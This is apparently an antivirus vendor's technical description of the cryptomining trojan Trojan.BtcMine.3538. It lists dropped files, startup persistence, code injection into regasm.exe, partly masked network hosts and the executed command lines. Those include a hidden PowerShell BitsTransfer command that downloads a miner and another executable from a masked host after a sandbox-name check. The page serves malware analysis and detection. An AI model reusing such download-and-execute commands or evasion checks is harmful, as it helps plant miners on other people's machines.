Trojan.BtcMine.3538

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

%APPDATA%\microsoft\windows\start menu\programs\startup\qnaotgdlat.url

Malicious functions

Injects code into

the following user processes:

regasm.exe

Modifies file system

Creates the following files

%TEMP%\7zipsfx.000\fyaeak.rt
%TEMP%\7zipsfx.001\app_3.0.6.2\nvidiasetp0state.exe
%TEMP%\7zipsfx.001\app_3.0.6.2\opencl\opencl.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\sharpcompress.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\system.buffers.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\system.memory.dll
%TEMP%\7zipsfx.001\miner_plugins\0e0a7320-94ec-11ea-a64d-17be303ea466\dlls\15.6\mp.xmrig.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\nhmcore.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\nhm.uuid.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\zxing.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\zxing.presentation.dll
%TEMP%\7zipsfx.001\createlogreport.exe
%TEMP%\7zipsfx.001\miner_plugins\0e0a7320-94ec-11ea-a64d-17be303ea466\dlls\15.0\mp.xmrig.dll
%TEMP%\7zipsfx.001\miner_plugins\0e0a7320-94ec-11ea-a64d-17be303ea466\dlls\15.1\mp.xmrig.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\system.numerics.vectors.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\websocket-sharp.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\device_detection_opencl.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\system.runtime.compilerservices.unsafe.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\mydownloader.core.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\hardcodet.wpf.taskbarnotification.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\log4net.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\managednvml.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\megaapiclient.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\microsoft.toolkit.wpf.ui.controls.webview.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\nhm.minerpluginloader.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\nhm.minersdownloader.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\nhm.minerplugintoolkitv1.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\newtonsoft.json.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\nhm.common.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\nhm.devicedetection.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\nhm.devicemonitoring.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\nhm.minerplugin.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\minerprocesscounter.exe
%TEMP%\7zipsfx.001\app_3.0.6.2\mydownloader.extension.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\device_monitoring_amd.dll
%TEMP%\7zipsfx.001\miner_plugins\0e0a7320-94ec-11ea-a64d-17be303ea466\dlls\15.7\mp.xmrig.dll
%TEMP%\7zipsfx.001\miner_plugins\27315fe0-3b03-11eb-b105-8d43d5bd63be\dlls\15.0\mp.excavator.dll
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\dlls\15.1\mp.nbminer.dll
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\dlls\15.10\mp.nbminer.dll
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\dlls\15.2\mp.nbminer.dll
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\dlls\15.3\mp.nbminer.dll
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\dlls\15.4\mp.nbminer.dll
%TEMP%\7zipsfx.001\miner_plugins\eb75e920-94eb-11ea-a64d-17be303ea466\mp.lolminer.dll
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\dlls\15.0\mp.nbminer.dll
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\dlls\15.5\mp.nbminer.dll
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\dlls\15.8\mp.nbminer.dll
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\dlls\15.9\mp.nbminer.dll
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\mp.nbminer.dll
%TEMP%\7zipsfx.001\nicehashminer.exe
%TEMP%\7zipsfx.001\runnhmasadmin.exe
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\dlls\15.6\mp.nbminer.dll
%TEMP%\7zipsfx.001\miner_plugins\f683f550-94eb-11ea-a64d-17be303ea466\dlls\15.7\mp.nbminer.dll
%TEMP%\7zipsfx.001\miner_plugins\0e0a7320-94ec-11ea-a64d-17be303ea466\dlls\15.9\mp.xmrig.dll
%TEMP%\7zipsfx.001\miner_plugins\0e0a7320-94ec-11ea-a64d-17be303ea466\dlls\15.8\mp.xmrig.dll
%TEMP%\7zipsfx.001\miner_plugins\eb75e920-94eb-11ea-a64d-17be303ea466\dlls\15.4\mp.lolminer.dll
%TEMP%\7zipsfx.001\miner_plugins\27315fe0-3b03-11eb-b105-8d43d5bd63be\dlls\15.1\mp.excavator.dll
%TEMP%\7zipsfx.001\miner_plugins\27315fe0-3b03-11eb-b105-8d43d5bd63be\dlls\15.2\mp.excavator.dll
%TEMP%\7zipsfx.001\miner_plugins\27315fe0-3b03-11eb-b105-8d43d5bd63be\dlls\15.4\mp.excavator.dll
%TEMP%\7zipsfx.001\miner_plugins\27315fe0-3b03-11eb-b105-8d43d5bd63be\dlls\15.5\mp.excavator.dll
%TEMP%\7zipsfx.001\miner_plugins\eb75e920-94eb-11ea-a64d-17be303ea466\dlls\15.5\mp.lolminer.dll
%TEMP%\7zipsfx.001\miner_plugins\0e0a7320-94ec-11ea-a64d-17be303ea466\mp.xmrig.dll
%TEMP%\7zipsfx.001\miner_plugins\eb75e920-94eb-11ea-a64d-17be303ea466\dlls\15.6\mp.lolminer.dll
%TEMP%\7zipsfx.001\miner_plugins\27315fe0-3b03-11eb-b105-8d43d5bd63be\dlls\15.6\mp.excavator.dll
%TEMP%\7zipsfx.001\miner_plugins\eb75e920-94eb-11ea-a64d-17be303ea466\dlls\15.0\mp.lolminer.dll
%TEMP%\7zipsfx.001\miner_plugins\eb75e920-94eb-11ea-a64d-17be303ea466\dlls\15.1\mp.lolminer.dll
%TEMP%\7zipsfx.001\miner_plugins\eb75e920-94eb-11ea-a64d-17be303ea466\dlls\15.2\mp.lolminer.dll
%TEMP%\7zipsfx.001\miner_plugins\eb75e920-94eb-11ea-a64d-17be303ea466\dlls\15.3\mp.lolminer.dll
%TEMP%\7zipsfx.001\miner_plugins\27315fe0-3b03-11eb-b105-8d43d5bd63be\dlls\15.7\mp.excavator.dll
%TEMP%\7zipsfx.001\miner_plugins\27315fe0-3b03-11eb-b105-8d43d5bd63be\dlls\15.8\mp.excavator.dll
%TEMP%\7zipsfx.001\miner_plugins\27315fe0-3b03-11eb-b105-8d43d5bd63be\mp.excavator.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\device_detection_cuda_nvml.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\device_detection_cpu.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\device_detection.exe
%TEMP%\7zipsfx.001\app_3.0.6.2\mydownloader.core.dll.config
%TEMP%\7zipsfx.001\app_3.0.6.2\mydownloader.extension.dll.config
%TEMP%\7zipsfx.001\app_3.0.6.2\newtonsoft.json.xml
%TEMP%\pxwsklzentkasztuo\acque.com
%TEMP%\7zipsfx.001\app_3.0.6.2\nhm.minersdownloader.dll.config
%TEMP%\7zipsfx.001\app_3.0.6.2\megaapiclient.xml
%TEMP%\7zipsfx.001\eula.html
%TEMP%\7zipsfx.001\app_3.0.6.2\log4net.xml
%TEMP%\7zipsfx.001\app_3.0.6.2\system.buffers.xml
%TEMP%\7zipsfx.001\app_3.0.6.2\system.memory.xml
%TEMP%\7zipsfx.001\app_3.0.6.2\translations.json
%TEMP%\7zipsfx.001\app_3.0.6.2\websocket-sharp.xml
%TEMP%\7zipsfx.001\createlogreport.exe.config
%TEMP%\7zipsfx.001\app_3.0.6.2\nvidiasetp0state.exe.config
%TEMP%\7zipsfx.001\app_3.0.6.2\nhmcore.dll.config
%TEMP%\7zipsfx.001\app_3.0.6.2\opencl\readme.md
%TEMP%\7zipsfx.001\app_3.0.6.2\checksums\files_sig.sha256sum
%TEMP%\7zipsfx.001\app_3.0.6.2\amdcomputemodeswitcher.exe.config
%TEMP%\7zipsfx.000\bit648c.tmp
%TEMP%\7zipsfx.000\bit648d.tmp
%TEMP%\pxwsklzentkasztuo\cancellato.pub
%TEMP%\pxwsklzentkasztuo\dattero.rtf
%TEMP%\pxwsklzentkasztuo\fessura.dot
%TEMP%\7zipsfx.001\app_3.0.6.2\device_detection.bat
%TEMP%\7zipsfx.001\eula.rtf
%TEMP%\7zipsfx.000\oprqcn.rt
%TEMP%\7zipsfx.001\app_3.0.6.2\app_nhm.exe.config
%TEMP%\7zipsfx.001\app_3.0.6.2\assets\enter_btc_manually.gif
%TEMP%\7zipsfx.001\app_3.0.6.2\checksums\files_no_sig.sha1sum
%TEMP%\7zipsfx.001\app_3.0.6.2\checksums\files_no_sig.sha256sum
%TEMP%\7zipsfx.001\app_3.0.6.2\checksums\files_sig.sha1sum
%TEMP%\pxwsklzentkasztuo\uso.xll
%TEMP%\pxwsklzentkasztuo\inebriato.vstm
%TEMP%\7zipsfx.001\app_3.0.6.2\minerprocesscounter.exe.config
%TEMP%\7zipsfx.001\nicehashminer.exe.config
%APPDATA%\azabarlrye\inebriato.vstm
%TEMP%\7zipsfx.001\app_3.0.6.2\amdcomputemodeswitcher.exe
%TEMP%\7zipsfx.001\app_3.0.6.2\app_nhm.exe
%TEMP%\7zipsfx.001\app_3.0.6.2\bouncycastle.crypto.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\common\cudart32_80.dll
%APPDATA%\azabarlrye\qnaotgdlat.com
%TEMP%\7zipsfx.001\runnhmasadmin.exe.config
%APPDATA%\azabarlrye\emnmbbxlxblg.js
%TEMP%\7zipsfx.001\app_3.0.6.2\common\cudart64_80.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\common\msvcp140.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\common\msvcr110.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\common\msvcr120.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\common\vcruntime140.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\common\cudart64_91.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\common\libcurl.dll
%TEMP%\7zipsfx.001\app_3.0.6.2\common\msvcp120.dll
%APPDATA%\azabarlrye\mcysnef
%TEMP%\7zipsfx.001\plugins_packages\zenemy_v15.0_mptoolkitv1_1484c660-94ec-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\ongpuslost.bat
%TEMP%\7zipsfx.001\plugins_packages\excavator_v15.8_mptoolkitv1_27315fe0-3b03-11eb-b105-8d43d5bd63be.zip
%TEMP%\7zipsfx.001\plugins_packages\gminercuda9.0+_v15.8_mptoolkitv1_e7a58030-94eb-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\lolminer_v15.6_mptoolkitv1_eb75e920-94eb-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\miniz_v15.2_mptoolkitv1_eda6abd0-94eb-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\nanominer_v15.4_mptoolkitv1_f25fee20-94eb-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\nbminer_v15.10_mptoolkitv1_f683f550-94eb-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\cryptodredge_v15.1_mptoolkitv1_e294f620-94eb-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\phoenix_v15.7_mptoolkitv1_fa369d10-94eb-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\teamredminer_v15.6_mptoolkitv1_01177a50-94ec-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\trex_v15.11_mptoolkitv1_03f80500-94ec-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\ttminer_v15.0_mptoolkitv1_074d4a80-94ec-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\update.json
%TEMP%\7zipsfx.001\plugins_packages\wildrig_v15.3_mptoolkitv1_0a07d6a0-94ec-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\xmrig_v15.9_mptoolkitv1_0e0a7320-94ec-11ea-a64d-17be303ea466.zip
%TEMP%\7zipsfx.001\plugins_packages\srbminer_v15.3_mptoolkitv1_fd45fff0-94eb-11ea-a64d-17be303ea466.zip
%TEMP%\pxwsklzentkasztuo\regasm.exe
%APPDATA%\logs\03-17-2021

Sets the 'hidden' attribute to the following files

%TEMP%\7zipsfx.000\bit648c.tmp
%TEMP%\7zipsfx.000\bit648d.tmp

Deletes the following files

%TEMP%\7zipsfx.000\fyaeak.rt
%TEMP%\7zipsfx.000\jwovkmfouykf.exe
%TEMP%\pxwsklzentkasztuo\uso.xll
%TEMP%\pxwsklzentkasztuo\inebriato.vstm

Moves the following files

from %TEMP%\7zipsfx.000\bit648c.tmp to %TEMP%\7zipsfx.000\nzpvaatbggcf.exe
from %TEMP%\7zipsfx.000\bit648d.tmp to %TEMP%\7zipsfx.000\jwovkmfouykf.exe

Network activity

Connects to

'microsoft.com':80
'do####adcrypto.ru':80
'ip##pi.com':80
'89.#8.99.64':222

TCP

HTTP GET requests

http://do####adcrypto.ru/soft/nicehashminer_3.0.6.2.exe
http://do####adcrypto.ru/soft/Weakness.exe

'89.#8.99.64':222

UDP

DNS ASK microsoft.com
DNS ASK do####adcrypto.ru
DNS ASK NN#############zIZQsCHyPAvG.NNrojNXjkTGNpipzIZQsCHyPAvG
DNS ASK ip##pi.com

Miscellaneous

Creates and executes the following

'%TEMP%\7zipsfx.000\nzpvaatbggcf.exe'
'%TEMP%\pxwsklzentkasztuo\acque.com' Uso.xll
'%TEMP%\7zipsfx.001\nicehashminer.exe'
'%TEMP%\pxwsklzentkasztuo\regasm.exe'
'%WINDIR%\syswow64\cmd.exe' /c echo PQwEUOY' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c powershell -command If ($env:computername -eq 'DESKTOP-QO5QU33') {exit}; Import-Module BitsTransfer; Start-BitsTransfer -Source http://do####adcrypto.ru/soft/nicehashminer_3.0.6.2.exe,http:/...' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c start NzpvaATbGGCf.exe & start JwOvKmFOUyKF.exe' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c echo kxhyjOO' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c cmd < Fessura.dot' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /c echo PQwEUOY
'%WINDIR%\syswow64\cmd.exe' /c powershell -command If ($env:computername -eq 'DESKTOP-QO5QU33') {exit}; Import-Module BitsTransfer; Start-BitsTransfer -Source http://do####adcrypto.ru/soft/nicehashminer_3.0.6.2.exe,http:/...
'%WINDIR%\syswow64\cmd.exe' /c start NzpvaATbGGCf.exe & start JwOvKmFOUyKF.exe
'%WINDIR%\syswow64\cmd.exe' /c echo kxhyjOO
'%WINDIR%\syswow64\cmd.exe' /c cmd < Fessura.dot
'%WINDIR%\syswow64\cmd.exe'
'%WINDIR%\syswow64\findstr.exe' /V /R "^eEpAvizBedDQpmjHmEhmSAiyEPiWasMDojCwQwjDWySXgLibaKfHzZPCbtWHZboKDqHWWkRnaKCNHpQSIKEIwylpvqEMyEDmWizgrlAuSRgIbwUhhrZfSmJnPnmWHt$" Dattero.rtf
'%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 30

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней